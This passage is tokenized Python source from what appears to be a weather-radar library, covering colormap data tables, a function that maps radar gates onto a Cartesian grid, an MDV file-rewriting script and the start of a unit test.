<NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuOr10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( 
<NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _BuDRd12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> 
, <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _LangRainbow12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> datad = { <EOL> '<STR_LIT>' : _NWSRef_data , <EOL> '<STR_LIT>' : _NWSVel_data , <EOL> '<STR_LIT>' : _NWS_SPW_data , <EOL> '<STR_LIT>' : _RefDiff_data , <EOL> '<STR_LIT>' : _Carbone11_data , <EOL> '<STR_LIT>' : _Carbone17_data , <EOL> '<STR_LIT>' : _RRate11_data , <EOL> '<STR_LIT>' : _BlueBrown10_data , <EOL> '<STR_LIT>' : _BlueBrown11_data , <EOL> '<STR_LIT>' : _Theodore16_data , <EOL> '<STR_LIT>' : _EWilson17_data , <EOL> '<STR_LIT>' : _Wild25_data , <EOL> '<STR_LIT>' : _SCook18_data , <EOL> '<STR_LIT>' : _PD17_data , <EOL> '<STR_LIT>' : _Gray5_data , <EOL> '<STR_LIT>' : _Gray9_data , <EOL> '<STR_LIT>' : _SymGray12_data , <EOL> '<STR_LIT>' : _Carbone42_data , <EOL> '<STR_LIT>' : _BrBu12_data , <EOL> '<STR_LIT>' : _GrMg16_data , <EOL> '<STR_LIT>' : _BrBu10_data , <EOL> '<STR_LIT>' : _Bu10_data , <EOL> '<STR_LIT>' : _BuDOr12_data , <EOL> '<STR_LIT>' : _StepSeq25_data , <EOL> '<STR_LIT>' : _RdYlBu11b_data , <EOL> '<STR_LIT>' : _Bu7_data , <EOL> '<STR_LIT>' : _BuOr12_data , <EOL> '<STR_LIT>' : _BuGr14_data , <EOL> '<STR_LIT>' : _BuDRd18_data , <EOL> '<STR_LIT>' : _BuDOr18_data , <EOL> '<STR_LIT>' : _BuOr8_data , <EOL> '<STR_LIT>' : _Cat12_data , <EOL> '<STR_LIT>' : _BuGy8_data , <EOL> '<STR_LIT>' : _BuOrR14_data , <EOL> '<STR_LIT>' : _BuOr10_data , <EOL> '<STR_LIT>' : _BuDRd12_data , <EOL> '<STR_LIT>' : _LangRainbow12_data , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . . core . radar import Radar <EOL> from . . core . transforms import geographic_to_cartesian <EOL> from . . filters import GateFilter , moment_based_gate_filter <EOL> from . _gate_to_grid_map import GateToGridMapper <EOL> from . _gate_to_grid_map import RoIFunction , ConstantRoI , DistBeamRoI , DistRoI <EOL> def map_gates_to_grid ( <EOL> radars , grid_shape , grid_limits , grid_origin = None , <EOL> grid_origin_alt = None , grid_projection = None , <EOL> fields = None , gatefilters = False , map_roi = True , <EOL> weighting_function = '<STR_LIT>' , toa = <NUM_LIT> , roi_func = '<STR_LIT>' , <EOL> constant_roi = <NUM_LIT> , z_factor = <NUM_LIT> , xy_factor = <NUM_LIT> , min_radius = <NUM_LIT> , <EOL> h_factor = <NUM_LIT:1.0> , nb = <NUM_LIT> , bsp = <NUM_LIT:1.0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( radars , Radar ) : <EOL> radars = ( radars , ) <EOL> skip_transform = False <EOL> if len ( radars ) == <NUM_LIT:1> and grid_origin_alt is None and grid_origin is None : <EOL> skip_transform = True <EOL> if grid_origin_alt is None : <EOL> grid_origin_alt = float ( radars [ <NUM_LIT:0> ] . altitude [ '<STR_LIT:data>' ] ) <EOL> gatefilters = _parse_gatefilters ( gatefilters , radars ) <EOL> cy_weighting_function = _detemine_cy_weighting_func ( weighting_function ) <EOL> projparams = _find_projparams ( grid_origin , radars , grid_projection ) <EOL> fields = _determine_fields ( fields , radars ) <EOL> grid_starts , grid_steps = _find_grid_params ( grid_shape , grid_limits ) <EOL> offsets = _find_offsets ( radars , projparams , grid_origin_alt ) <EOL> roi_func = _parse_roi_func ( roi_func , constant_roi , z_factor , xy_factor , <EOL> min_radius , h_factor , nb , bsp , offsets ) <EOL> nfields = len ( fields ) <EOL> grid_sum = np . zeros ( grid_shape + ( nfields , ) , dtype = np . float32 ) <EOL> grid_wsum = np . zeros ( grid_shape + ( nfields , ) , dtype = np . 
float32 ) <EOL> gatemapper = GateToGridMapper ( <EOL> grid_shape , grid_starts , grid_steps , grid_sum , grid_wsum ) <EOL> for radar , gatefilter in zip ( radars , gatefilters ) : <EOL> shape = ( radar . nrays , radar . ngates , nfields ) <EOL> field_data = np . empty ( shape , dtype = '<STR_LIT>' ) <EOL> field_mask = np . empty ( shape , dtype = '<STR_LIT>' ) <EOL> for i , field in enumerate ( fields ) : <EOL> fdata = radar . fields [ field ] [ '<STR_LIT:data>' ] <EOL> field_data [ : , : , i ] = np . ma . getdata ( fdata ) <EOL> field_mask [ : , : , i ] = np . ma . getmaskarray ( fdata ) <EOL> if gatefilter is False : <EOL> gatefilter = GateFilter ( radar ) <EOL> elif gatefilter is None : <EOL> gatefilter = moment_based_gate_filter ( radar , ** kwargs ) <EOL> excluded_gates = gatefilter . gate_excluded . astype ( '<STR_LIT>' ) <EOL> if skip_transform : <EOL> gate_x = radar . gate_x [ '<STR_LIT:data>' ] <EOL> gate_y = radar . gate_y [ '<STR_LIT:data>' ] <EOL> else : <EOL> gate_x , gate_y = geographic_to_cartesian ( <EOL> radar . gate_longitude [ '<STR_LIT:data>' ] , radar . gate_latitude [ '<STR_LIT:data>' ] , <EOL> projparams ) <EOL> gate_z = radar . gate_altitude [ '<STR_LIT:data>' ] - grid_origin_alt <EOL> gatemapper . map_gates_to_grid ( <EOL> radar . ngates , radar . nrays , gate_z . astype ( '<STR_LIT>' ) , <EOL> gate_y . astype ( '<STR_LIT>' ) , gate_x . astype ( '<STR_LIT>' ) , <EOL> field_data , field_mask , excluded_gates , <EOL> toa , roi_func , cy_weighting_function ) <EOL> mweight = np . ma . masked_equal ( grid_wsum , <NUM_LIT:0> ) <EOL> msum = np . ma . masked_array ( grid_sum , mweight . mask ) <EOL> grids = dict ( <EOL> [ ( f , msum [ ... , i ] / mweight [ ... , i ] ) for i , f in enumerate ( fields ) ] ) <EOL> if map_roi : <EOL> roi_array = np . empty ( grid_shape , dtype = np . float32 ) <EOL> gatemapper . 
find_roi_for_grid ( roi_array , roi_func ) <EOL> grids [ '<STR_LIT>' ] = roi_array <EOL> return grids <EOL> def _detemine_cy_weighting_func ( weighting_function ) : <EOL> """<STR_LIT>""" <EOL> if weighting_function . upper ( ) == '<STR_LIT>' : <EOL> cy_weighting_function = <NUM_LIT:1> <EOL> elif weighting_function . upper ( ) == '<STR_LIT>' : <EOL> cy_weighting_function = <NUM_LIT:0> <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return cy_weighting_function <EOL> def _find_projparams ( grid_origin , radars , grid_projection ) : <EOL> """<STR_LIT>""" <EOL> if grid_origin is None : <EOL> lat = float ( radars [ <NUM_LIT:0> ] . latitude [ '<STR_LIT:data>' ] ) <EOL> lon = float ( radars [ <NUM_LIT:0> ] . longitude [ '<STR_LIT:data>' ] ) <EOL> grid_origin = ( lat , lon ) <EOL> grid_origin_lat , grid_origin_lon = grid_origin <EOL> if grid_projection is None : <EOL> grid_projection = { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } <EOL> projparams = grid_projection . copy ( ) <EOL> if projparams . pop ( '<STR_LIT>' , False ) : <EOL> projparams [ '<STR_LIT>' ] = grid_origin_lon <EOL> projparams [ '<STR_LIT>' ] = grid_origin_lat <EOL> return projparams <EOL> def _parse_gatefilters ( gatefilters , radars ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( gatefilters , GateFilter ) : <EOL> gatefilters = ( gatefilters , ) <EOL> if gatefilters is False : <EOL> gatefilters = ( False , ) * len ( radars ) <EOL> if gatefilters is None : <EOL> gatefilters = ( None , ) * len ( radars ) <EOL> if len ( gatefilters ) != len ( radars ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return gatefilters <EOL> def _determine_fields ( fields , radars ) : <EOL> """<STR_LIT>""" <EOL> if fields is None : <EOL> fields = set ( radars [ <NUM_LIT:0> ] . fields . keys ( ) ) <EOL> for radar in radars [ <NUM_LIT:1> : ] : <EOL> fields = fields . intersection ( radar . fields . 
keys ( ) ) <EOL> fields = list ( fields ) <EOL> return fields <EOL> def _find_offsets ( radars , projparams , grid_origin_alt ) : <EOL> """<STR_LIT>""" <EOL> offsets = [ ] <EOL> for radar in radars : <EOL> x_disp , y_disp = geographic_to_cartesian ( <EOL> radar . longitude [ '<STR_LIT:data>' ] , radar . latitude [ '<STR_LIT:data>' ] , projparams ) <EOL> z_disp = float ( radar . altitude [ '<STR_LIT:data>' ] ) - grid_origin_alt <EOL> offsets . append ( ( z_disp , float ( y_disp ) , float ( x_disp ) ) ) <EOL> return offsets <EOL> def _find_grid_params ( grid_shape , grid_limits ) : <EOL> """<STR_LIT>""" <EOL> nz , ny , nx = grid_shape <EOL> zr , yr , xr = grid_limits <EOL> z_start , z_stop = zr <EOL> y_start , y_stop = yr <EOL> x_start , x_stop = xr <EOL> if nz == <NUM_LIT:1> : <EOL> z_step = <NUM_LIT:0.> <EOL> else : <EOL> z_step = ( z_stop - z_start ) / ( nz - <NUM_LIT:1.> ) <EOL> if ny == <NUM_LIT:1> : <EOL> y_step = <NUM_LIT:0.> <EOL> else : <EOL> y_step = ( y_stop - y_start ) / ( ny - <NUM_LIT:1.> ) <EOL> if nx == <NUM_LIT:1> : <EOL> x_step = <NUM_LIT:0.> <EOL> else : <EOL> x_step = ( x_stop - x_start ) / ( nx - <NUM_LIT:1.> ) <EOL> grid_starts = ( z_start , y_start , x_start ) <EOL> grid_steps = ( z_step , y_step , x_step ) <EOL> return grid_starts , grid_steps <EOL> def _parse_roi_func ( roi_func , constant_roi , z_factor , xy_factor , min_radius , <EOL> h_factor , nb , bsp , offsets ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( roi_func , RoIFunction ) : <EOL> if roi_func == '<STR_LIT>' : <EOL> roi_func = ConstantRoI ( constant_roi ) <EOL> elif roi_func == '<STR_LIT>' : <EOL> roi_func = DistRoI ( z_factor , xy_factor , min_radius , offsets ) <EOL> elif roi_func == '<STR_LIT>' : <EOL> roi_func = DistBeamRoI ( h_factor , nb , bsp , min_radius , offsets ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % roi_func ) <EOL> return roi_func </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> import StringIO <EOL> import gzip <EOL> import pyart <EOL> MASTER_HEADER_SIZE = <NUM_LIT> <EOL> FIELD_HEADER_SIZE = <NUM_LIT> <EOL> VLEVEL_HEADER_SIZE = <NUM_LIT> <EOL> CHUNK_HEADER_SIZE = <NUM_LIT> <EOL> COMPRESSION_INFO_SIZE = <NUM_LIT> <EOL> SWEEP_INFO_SIZE = <NUM_LIT:8> <EOL> FIELD_NUMBER = <NUM_LIT:3> <EOL> NGATES = <NUM_LIT> <EOL> NFIELDS = <NUM_LIT:1> <EOL> INFILE = '<STR_LIT>' <EOL> OUTFILE = '<STR_LIT>' <EOL> mdvfile = pyart . io . mdv . MdvFile ( INFILE ) <EOL> number_of_fields = int ( mdvfile . master_header [ '<STR_LIT>' ] ) <EOL> bias = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> scale = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> in_field_offset = mdvfile . field_headers [ FIELD_NUMBER ] [ '<STR_LIT>' ] <EOL> fdata = ( ( mdvfile . read_a_field ( FIELD_NUMBER ) - bias ) / scale ) [ <NUM_LIT:0> , : , : NGATES ] <EOL> mdvfile . close ( ) <EOL> fdata_str = fdata . astype ( '<STR_LIT>' ) . byteswap ( ) . tostring ( ) <EOL> uncompressed_data_size = len ( fdata_str ) <EOL> fileobj = StringIO . StringIO ( ) <EOL> gzipfile = gzip . GzipFile ( fileobj = fileobj , mode = '<STR_LIT:w>' ) <EOL> gzipfile . write ( fdata_str ) <EOL> gzipfile . close ( ) <EOL> compressed_field_data = fileobj . getvalue ( ) <EOL> compressed_data_size = len ( compressed_field_data ) <EOL> f = open ( INFILE , '<STR_LIT:rb>' ) <EOL> out = open ( OUTFILE , '<STR_LIT:wb>' ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT> ] = NFIELDS <EOL> l [ <NUM_LIT:20> ] = NGATES <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE + FIELD_HEADER_SIZE <EOL> l [ <NUM_LIT> ] = MASTER_HEADER_SIZE + FIELD_HEADER_SIZE + VLEVEL_HEADER_SIZE <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_NUMBER * FIELD_HEADER_SIZE ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . 
unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:9> ] = NGATES <EOL> field_data_offset = ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE + <EOL> VLEVEL_HEADER_SIZE + CHUNK_HEADER_SIZE * FIELD_NUMBER ) <EOL> l [ <NUM_LIT:15> ] = field_data_offset <EOL> l [ <NUM_LIT:16> ] = compressed_data_size + COMPRESSION_INFO_SIZE + SWEEP_INFO_SIZE <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE * number_of_fields + <EOL> FIELD_NUMBER * VLEVEL_HEADER_SIZE ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( MASTER_HEADER_SIZE + FIELD_HEADER_SIZE * number_of_fields + <EOL> VLEVEL_HEADER_SIZE * number_of_fields ) <EOL> fmt = '<STR_LIT>' <EOL> chunk_data_offset = ( compressed_data_size + field_data_offset + <EOL> SWEEP_INFO_SIZE + COMPRESSION_INFO_SIZE ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> info_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> calib_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset + <NUM_LIT> <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> elevs_chunk_offset = int ( l [ <NUM_LIT:3> ] ) <EOL> l [ <NUM_LIT:3> ] = chunk_data_offset + <NUM_LIT> + <NUM_LIT> <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( in_field_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . 
calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:1> ] = uncompressed_data_size <EOL> l [ <NUM_LIT:2> ] = compressed_data_size + COMPRESSION_INFO_SIZE <EOL> l [ <NUM_LIT:3> ] = compressed_data_size <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> out . write ( compressed_field_data ) <EOL> f . seek ( info_chunk_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> l [ <NUM_LIT:2> ] = NFIELDS <EOL> l [ <NUM_LIT:3> ] = NGATES <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( calib_chunk_offset ) <EOL> fmt = '<STR_LIT>' <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> f . seek ( elevs_chunk_offset ) <EOL> fmt = '<STR_LIT>' % ( <NUM_LIT:2> ) <EOL> l = list ( struct . unpack ( fmt , f . read ( struct . calcsize ( fmt ) ) ) ) <EOL> out . write ( struct . pack ( fmt , * l ) ) <EOL> out . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import pyart <EOL> def test_is_vpt ( ) : <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> assert not pyart . util . is_vpt ( radar ) <EOL> pyart . util . to_vpt ( radar ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> def test_to_vpt ( ) : <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> radar . instrument_parameters = { <EOL> '<STR_LIT>' : { '<STR_LIT:data>' : np . array ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) } <EOL> } <EOL> pyart . util . to_vpt ( radar ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> assert radar . nsweeps == <NUM_LIT:1> <EOL> assert radar . azimuth [ '<STR_LIT:data>' ] [ <NUM_LIT:10> ] == <NUM_LIT:0.0> <EOL> assert radar . elevation [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> assert len ( radar . instrument_parameters [ '<STR_LIT>' ] [ '<STR_LIT:data>' ] ) == <NUM_LIT:1> <EOL> radar = pyart . testing . make_empty_ppi_radar ( <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:3> ) <EOL> radar . instrument_parameters = { <EOL> '<STR_LIT>' : { '<STR_LIT:data>' : np . array ( [ '<STR_LIT>' ] * <NUM_LIT:3> ) } <EOL> } <EOL> pyart . util . to_vpt ( radar , False ) <EOL> assert pyart . util . is_vpt ( radar ) <EOL> assert radar . nsweeps == <NUM_LIT> <EOL> assert radar . 